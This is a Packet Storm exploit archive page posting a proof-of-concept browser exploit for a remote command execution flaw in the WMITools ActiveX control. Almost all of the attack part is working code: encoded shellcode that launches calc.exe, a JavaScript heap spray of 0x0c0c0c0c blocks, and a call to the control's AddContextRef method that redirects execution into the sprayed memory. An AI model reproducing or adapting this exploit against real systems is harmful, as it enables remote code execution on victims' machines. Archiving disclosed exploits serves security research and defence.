exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WMITools Active-X Remote Command Execution

WMITools Active-X Remote Command Execution
Posted Dec 22, 2010
Authored by WooYun

WMITools active-x remote command execution exploit.

tags | exploit, remote, activex
SHA-256 | 6b0a484e631d95cf807c1c83d42fe96b172b70ef9a1ca18fd64b8e1550aeee80

WMITools Active-X Remote Command Execution

Change Mirror Download
<html>

<object classid="clsid:2745E5F5-D234-11D0-847A-00C04FD7BB08" id="target"></object>



<SCRIPT language="JavaScript">

//run calc.exe

var shellcode = unescape("%uc92b%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u0c13%u452b%u83df%ufceb%uf4e2%uc3f0%udf01%u2b0c%u9ace%ua030%uda39%u2a74%u54aa%u3343%u80ce%u2a2c%u96ae%u1f87%udece%u1ae2%u4685%uafa0%uab85%uea0b%ud28f%ue90d%u2bae%u7f37%udb61%uce79%u80ce%u2a28%ub9ae%u2787%u540e%u3753%u3444%u3787%udece%ua2e7%ufb19%ue808%u1f74%ua068%uef05%ueb89%ud33d%u6b87%u5449%u377c%u54e8%u2364%ud6ae%uab87%udff5%u2b0c%ub7ce%u7430%u2974%u7d6c%u27cc%ueb8f%u8f3e%udb64%udbcf%u4353%u21dd%u2586%u2012%u48eb%ub324%u2b6f%udf45%u0000");



//先喷好堆

var bigblock = unescape("%u0C0C%u0C0C");

var headersize = 20;

var slackspace = headersize+shellcode.length;

while (bigblock.length<slackspace) bigblock+=bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length+slackspace<0x40000) block = block+block+fillblock;

memory = new Array();

for (x=0; x<350; x++) memory[x] = block +shellcode;



//让程序直接call过去

target.AddContextRef(0x0c0c0c0c);

</script>

</html>

Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    0 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close